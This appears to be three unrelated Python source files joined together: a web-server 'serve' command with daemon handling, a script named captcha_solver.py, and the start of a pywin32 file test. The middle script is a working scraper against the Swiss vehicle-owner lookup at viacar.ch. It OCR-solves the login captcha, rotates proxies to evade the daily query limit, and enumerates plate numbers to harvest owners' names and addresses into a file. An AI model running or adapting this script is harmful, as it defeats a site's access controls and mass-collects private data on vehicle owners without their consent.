self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
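# Illustrative note (assumption, not from the original code): on Windows,
# win32api.GetShortPathName maps a long path containing spaces to its 8.3
# alias, e.g. r'C:\Program Files\Foo\foo.exe' -> r'C:\PROGRA~1\Foo\foo.exe',
# so the command can then be spawned without additional quoting.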
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
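# Hypothetical config fragment (illustrative only; section contents are not
# taken from this project) that would activate the fileConfig() branch above:
#
# [loggers]
# keys = root
#
# [handlers]
# keys = console
#
# [formatters]
# keys = generic
#
# [logger_root]
# level = INFO
# handlers = console
#
# [handler_console]
# class = StreamHandler
# args = (sys.stderr,)
# formatter = generic
#
# [formatter_generic]
# format = %(asctime)s %(levelname)s [%(name)s] %(message)s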
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' %s %s' % (self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
import socket
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be run from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
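# Editorial summary (hedged): daemonize() below follows the classic Unix
# double-fork recipe - fork and _exit() the parent, setsid() to start a new
# session, fork again so the daemon is no longer a session leader, close all
# inherited file descriptors, and point stdin/stdout/stderr at /dev/null.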
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked child also has handles on shared resources, so we
# *don't* want the parent's normal termination cleanup to run; we
# just want it to exit quickly (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork a second time so the daemon is not a session leader and cannot reacquire a controlling terminal
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
import pwd
import grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
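# Minimal usage sketch (illustrative only), mirroring how command() above
# redirects output once the process may already be daemonized:
#
# log = LazyWriter('paster.log', 'a')
# sys.stdout = log
# sys.stderr = log
# print('this first write is what actually opens the file')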
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least let's not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print('Stale PID left in file: %s (%s)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
import socket
import errno
for bound_address in bound_addresses:
for attempt in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.args[0] != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e.message)
exit_code = e.exit_code
sys.exit(exit_code)
|
captcha_solver.py
|
# -*- coding: utf-8 -*-
import os
import pytesseract
import time
import Queue
from BeautifulSoup import BeautifulSoup
import re
import threading
import pickle
import pyautogui
import cv2
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver import ActionChains
import fetch_mod
login_active = False
userhome = os.path.expanduser('~')
username = os.path.split(userhome)[-1]
webdriverPath = r'C:\Python27\webdrivers\chromedriver.exe'
if username == "mani":
downloadPath = r"C:\Users\mani\Documents\Downloads\JpegGenerate.jpg"
elif username == "user":
downloadPath = r"C:\Users\user\Downloads\JpegGenerate.jpg"
dictMsgStr = {
"search": "Suchen Sie den Halter oder die Halterin durch die Eingabe der "
"Kontrollschildnummer im nachstehenden Feld.",
"wait": "Ihre Anfrage wird verarbeitet ....",
"limit": "Sie haben die Anzahl zulässiger Abfragen für heute erreicht.",
"result": "Suchergebnis f",
"timeout": "Die Zeit ist abgelaufen, bitte neu anmelden.",
"noresult": "Das Suchergebnis ist negativ ausgefallen.",
"login": "r die Anmeldung die oben angezeigte Nummer ein."}
# List of license numbers and owner : [(licenseNumber,owner),...]
ownerList = []
driver_threads = []
license_number_queue = Queue.Queue()
pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)'\
'/Tesseract-OCR/tesseract'
def init():
licenseNumbers = []
for i in range(1, 2000):
licenseNumbers.append(i)
for licenseNumber in licenseNumbers:
license_number_queue.put(licenseNumber)
def makelist(table):
result = []
allrows = table.findAll('tr')
firstItem = True
for row in allrows:
result.append([])
allcols = row.findAll('td')
for col in allcols:
# do not add the first item (it's an empty list)
if firstItem:
firstItem = False
continue
thestrings = [unicode(s) for s in col.findAll(text=True)]
thetext = ''.join(thestrings)
regex = re.compile(r'[\n\r\t]')
thetext = regex.sub('', thetext)
result[-1].append(thetext)
return result
def save_car_owner(driver, licenseNumber):
time.sleep(1)
driver.find_element_by_id("TextBoxKontrollschild").clear()
driver.find_element_by_id("TextBoxKontrollschild").send_keys(licenseNumber)
driver.find_element_by_id("ButtonSuchen").click()
time.sleep(1)
source = driver.page_source
if source.find(dictMsgStr["noresult"]) != -1:
print "No result for license number: " + str(licenseNumber)
ownerList.append([[u'Art:', u''], [u'Name:', u''], [u'Strasse:', u''],
[u'Ort:', u''], ['LicenseNumber:', licenseNumber]])
driver.find_element_by_id("ButtonWeiter").click()
time.sleep(0.5)
return True
if source.find(dictMsgStr["result"]) == -1:
print "Error strange page for license number: " + str(licenseNumber)
return False
driver.find_element_by_id("ButtonWeiter").click()
soup = BeautifulSoup(source)
tables = soup.find("table", attrs={"bgcolor": "whitesmoke"})
ownerData = makelist(tables)
ownerData.append(["licenseNumber", licenseNumber])
print ownerData
ownerList.append(ownerData)
return True
def solveCaptcha():
watchdog = time.time()
while not os.path.isfile(downloadPath):
if (time.time() - watchdog) > 8:
return None
time.sleep(0.05)
time.sleep(0.1)
frame = cv2.imread(downloadPath)
ret, thresh = cv2.threshold(frame, 80, 255, cv2.THRESH_BINARY)
thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
denoise = cv2.fastNlMeansDenoising(thresh, searchWindowSize=18, h=65)
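# About the pytesseract config used below (descriptive note): the character
# whitelist restricts recognition to digits and uppercase letters, and
# "-psm 8" makes Tesseract treat the whole image as a single word, which
# suits a short one-line captcha.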
return pytesseract.image_to_string(
Image.fromarray(denoise),
config="-c tessedit_char_whitelist=0123456789ABCDEFGHIJKLMNOPQRSTUVW"
"XYZ -psm 8")
def new_driver_thread(PROXY):
global login_active
# start of critical section (focus needed)
login_active = True
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--proxy-server=%s' % PROXY)
chrome_options.add_argument("--window-size=400,600")
driver = webdriver.Chrome(webdriverPath, chrome_options=chrome_options)
driver.implicitly_wait(60)
base_url = "https://www.viacar.ch"
verificationErrors = []
accept_next_alert = True
success = False
driver.get(base_url + "/eindex/Login.aspx?Kanton=ZH")
source = driver.page_source
# if we don't get to the login page something is fishy with the proxy
if source.find(dictMsgStr["login"]) == -1:
login_active = False
driver.quit()
time.sleep(1)
return
while not success:
try:
os.remove(downloadPath)
except BaseException:
pass
SecBild = driver.find_element_by_id("SecBild")
ActionChains(driver) \
.move_to_element(SecBild) \
.context_click(SecBild) \
.perform()
pyautogui.press('down')
time.sleep(0.2)
pyautogui.press('down')
time.sleep(0.2)
pyautogui.press('enter')
# time.sleep(1.5)
# pyautogui.typewrite(downloadPath)
# time.sleep(0.8)
time.sleep(1)
pyautogui.press('enter')
source = driver.page_source
searchStr = 'document.getElementById("'
pos1 = source.find(searchStr) + len(searchStr)
pos2 = source.find('"', pos1 + 1)
input_id = source[pos1:pos2]
captchaSolution = solveCaptcha()
# print captchaSolution
if captchaSolution is None:
login_active = False
driver.quit()
time.sleep(1)
return
driver.find_element_by_id(input_id).clear()
driver.find_element_by_id(input_id).send_keys(captchaSolution)
time.sleep(0.1)
driver.find_element_by_id("BtLogin").click()
source = driver.page_source
if source.find(dictMsgStr["search"]) == -1:
success = False
# if we are not back on the login page something is fishy with the
# proxy
if source.find(dictMsgStr["login"]) == -1:
login_active = False
driver.quit()
time.sleep(1)
return
else:
# print "Success!!!"
success = True
# End of critical section (no focus needed anymore)
login_active = False
source = driver.page_source
while source.find(dictMsgStr["search"]) != -1:
try:
licenseNumber = license_number_queue.get_nowait()
except Queue.Empty:
driver.quit()
time.sleep(1)
return
if licenseNumber is None:
driver.quit()
time.sleep(1)
return
if not save_car_owner(driver, licenseNumber):
# if we get a strange page instead of a result or noresult we store
# the license number back in the queue
license_number_queue.put(licenseNumber)
source = driver.page_source
# time.sleep(5) # Pause to allow you to inspect the browser.
driver.quit()
def main():
global login_active
proxythread = threading.Thread(target=fetch_mod.main)
proxythread.setDaemon(True)
proxythread.start()
init()
time.sleep(8)
initialActiveCount = threading.active_count()
while not license_number_queue.empty():
# get the next proxy
while True:
try:
proxyItem = fetch_mod.get_queue().get()
if proxyItem["type"] == "http":
break
except BaseException:
print "no proxys available!!!"
time.sleep(5)
PROXY = str(proxyItem["IP"]) + ":" + str(proxyItem["PORT"])
# wait with creating new thread until no login and less than x threads
while login_active or (
threading.active_count() - initialActiveCount) >= 6:
time.sleep(0.1)
driver_thread = threading.Thread(
name="driver_thread",
target=new_driver_thread,
args=(PROXY,)
)
driver_thread.start()
driver_threads.append(driver_thread)
# Yes we really have to wait over 30 seconds to catch all the results
# of the other threads
time.sleep(50)
for owner in ownerList:
print owner
with open('car_owners.pickle', 'wb') as f:
pickle.dump(ownerList, f)
if __name__ == '__main__':
start = time.time()
print "start"
main()
print "time: " + str(time.time() - start)
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
